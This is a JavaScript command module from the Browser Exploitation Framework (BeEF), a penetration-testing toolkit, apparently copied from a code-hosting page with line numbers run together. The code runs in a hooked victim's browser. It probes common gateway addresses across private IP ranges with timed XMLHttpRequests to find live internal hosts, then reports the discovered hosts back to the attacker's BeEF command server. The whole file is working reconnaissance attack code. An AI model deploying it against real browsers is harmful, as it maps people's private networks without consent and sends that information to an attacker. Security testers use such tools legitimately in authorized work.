Path: blob/master/modules/network/identify_lan_subnets/command.js
1873 views
//1// Copyright (c) 2006-2026Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78if(!beef.browser.isFF() && !beef.browser.isC()){9beef.debug("[command #<%= @command_id %>] Browser is not supported.");10beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.are.status_error());11}1213var min_timeout = 500;14var ranges = [15'192.168.0.0',16'192.168.1.0',17'192.168.2.0',18'192.168.10.0',19'192.168.100.0',20'192.168.123.0',21'10.0.0.0',22'10.0.1.0',23'10.1.1.0',24'10.10.10.0',25'172.16.0.0',26'172.16.1.0'27];2829var doScan = function(timeout) {3031var discovered_hosts = [];32var proto = "http";3334var doRequest = function(host) {35var d = new Date;36var xhr = new XMLHttpRequest();37xhr.timeout = timeout;38xhr.onreadystatechange = function(){39if(xhr.readyState == 4){40var time = new Date().getTime() - d.getTime();41var aborted = false;42// if we call window.stop() the event triggered is 'abort'43// http://www.w3.org/TR/XMLHttpRequest/#event-handlers44xhr.onabort = function(){45aborted = true;46}47xhr.onloadend = function(){48if(time < timeout){49// 'abort' fires always before 'onloadend'50if(time > 1 && aborted === false){51beef.debug('Discovered host ['+host+'] in ['+time+'] ms');52discovered_hosts.push(host);53}54}55}56}57}58xhr.open("GET", proto + "://" + host, true);59xhr.send();60}6162var requests = new Array();63for (var i = 0; i < ranges.length; i++) {64// the following returns like 192.168.0.65var c = ranges[i].split('.')[0]+'.'+66ranges[i].split('.')[1]+'.'+67ranges[i].split('.')[2]+'.';68// for every entry in the 'ranges' array, request69// the most common gateway IPs, like:70// 192.168.0.1, 192.168.0.100, 192.168.0.25471requests.push(c + '1');72requests.push(c + '100');73requests.push(c + '254');74}7576// process queue77var count = requests.length;78beef.debug("[command #<%= @command_id %>] Identifying LAN hosts ("+count+" URLs) (Timeout " + timeout + "ms)");79var check_timeout = (timeout * count + parseInt(timeout,10));80var handle = setInterval(function() {81if (requests.length > 0) {82doRequest(requests.pop());83}84}, timeout);8586// check for results87checkResults = function() {8889if (handle) {90beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");91clearInterval(handle);92handle = 0;93}9495var hosts = discovered_hosts.join(",");96beef.debug("Discovered " + discovered_hosts.length + " hosts: " + hosts);97if (discovered_hosts.length >= 5) {98// if we get 5+ results something probably went wrong. this happens sometimes.99if (timeout > min_timeout) {100// if timeout is more than 500ms then decrease timeout by 500ms and try again101beef.debug("Returned large hit rate (" + discovered_hosts.length + " of " + count + ") indicating low network latency. Retrying scan with decreased timeout (" + (timeout - 500) + "ms)");102doScan(timeout-500);103} else {104beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts, beef.are.status_error());105}106} else if (discovered_hosts.length == 0) {107beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results", beef.are.status_error());108} else {109beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed.");110beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts, beef.are.status_success());111beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");112}113}114setTimeout("checkResults();", check_timeout);115116}117118var timeout = "<%= @timeout %>";119if (isNaN(timeout) || timeout < 1) timeout = min_timeout;120doScan(parseInt(timeout,10));121122});123124125